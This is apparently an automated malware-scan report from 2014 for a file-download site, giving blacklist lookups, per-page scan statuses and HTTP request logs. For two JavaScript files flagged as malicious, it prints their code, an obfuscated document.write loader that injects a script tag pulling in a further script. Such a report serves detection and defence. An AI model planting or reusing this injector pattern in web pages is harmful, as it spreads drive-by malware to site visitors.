Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cuyoxola.x777.info
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cuyoxola.x777.info/
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as SMS-fraud resource. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cuyoxola.x777.info/ | 200 OK Content-Length: 40300 Content-Type: text/html | clean |
http://cuyoxola.x777.info/roga-i-kopita--barnyard.html | 200 OK Content-Length: 29566 Content-Type: text/html | clean |
http://cuyoxola.x777.info/download/txt2222.js | 200 OK Content-Length: 83 Content-Type: application/javascript | clean |
http://cuyoxola.x777.info/download/f19909.js | 200 OK Content-Length: 166 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function counter_quoted(str) {
return 'download/c.js'; } document.write('<scr' + 'ipt type="text/javascript"' + ' src=' + counter_quoted('in') +'></scr' + 'ipt>'); Antivirus reports:
| ||
http://cuyoxola.x777.info/download/f21594.js | 200 OK Content-Length: 166 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function counter_quoted(str) {
return 'download/d.js'; } document.write('<scr' + 'ipt type="text/javascript"' + ' src=' + counter_quoted('in') +'></scr' + 'ipt>'); Antivirus reports:
| ||
http://cuyoxola.x777.info/part-ii-2011.html | 200 OK Content-Length: 28386 Content-Type: text/html | clean |
http://cuyoxola.x777.info/drayver-usb-acorp-ac1uaa-20.html | 200 OK Content-Length: 32983 Content-Type: text/html | clean |
http://cuyoxola.x777.info/evolution-fullrus2010psp.html | 200 OK Content-Length: 34254 Content-Type: text/html | clean |
http://cuyoxola.x777.info/vladimir-visockiy--live-story--kollekciya-5cd.html | 200 OK Content-Length: 30112 Content-Type: text/html | clean |
http://cuyoxola.x777.info/otigrivat-elfa-ne-prosto.html | 200 OK Content-Length: 31501 Content-Type: text/html | clean |
http://cuyoxola.x777.info/rayt-d-eddis-b-leong-e--morfologicheskaya-diagnostika-patologii.html | 200 OK Content-Length: 33775 Content-Type: text/html | clean |
http://cuyoxola.x777.info/instrukciya-po-ekspluatacii-motocikla-yamaha-yzfr6.html | 200 OK Content-Length: 31622 Content-Type: text/html | clean |
http://cuyoxola.x777.info/armin-van-buuren--a-state-of-trance-460-10062010.html | 200 OK Content-Length: 32638 Content-Type: text/html | clean |
http://cuyoxola.x777.info/luganceva.html | 200 OK Content-Length: 33470 Content-Type: text/html | clean |
http://cuyoxola.x777.info/film-interdevochka.html | 200 OK Content-Length: 32217 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cuyoxola.x777.info
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public, proxy-revalidate, public, proxy-revalidate
Connection: close
Date: Thu, 18 Sep 2014 21:58:02 GMT
Accept-Ranges: bytes
Age: 1
Server: ATS/4.2.2
Vary: Accept-Encoding
Content-Length: 40300
Content-Type: text/html
Expires: Sat, 18 Oct 2014 21:58:02 GMT
Last-Modified: Thu, 27 Dec 2012 11:02:56 GMT
...40300 bytes of data.
GET / HTTP/1.1
Host: cuyoxola.x777.info
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=2592000, public, proxy-revalidate, public, proxy-revalidate
Connection: close
Date: Thu, 18 Sep 2014 21:58:02 GMT
Accept-Ranges: bytes
Age: 1
Server: ATS/4.2.2
Vary: Accept-Encoding
Content-Length: 40300
Content-Type: text/html
Expires: Sat, 18 Oct 2014 21:58:02 GMT
Last-Modified: Thu, 27 Dec 2012 11:02:56 GMT
...40300 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cuyoxola.x777.info
Referer: http://www.google.com/search?q=cuyoxola.x777.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cuyoxola.x777.info
Referer: http://www.google.com/search?q=cuyoxola.x777.info
Result:
The result is similar to the first query. There are no suspicious redirects found.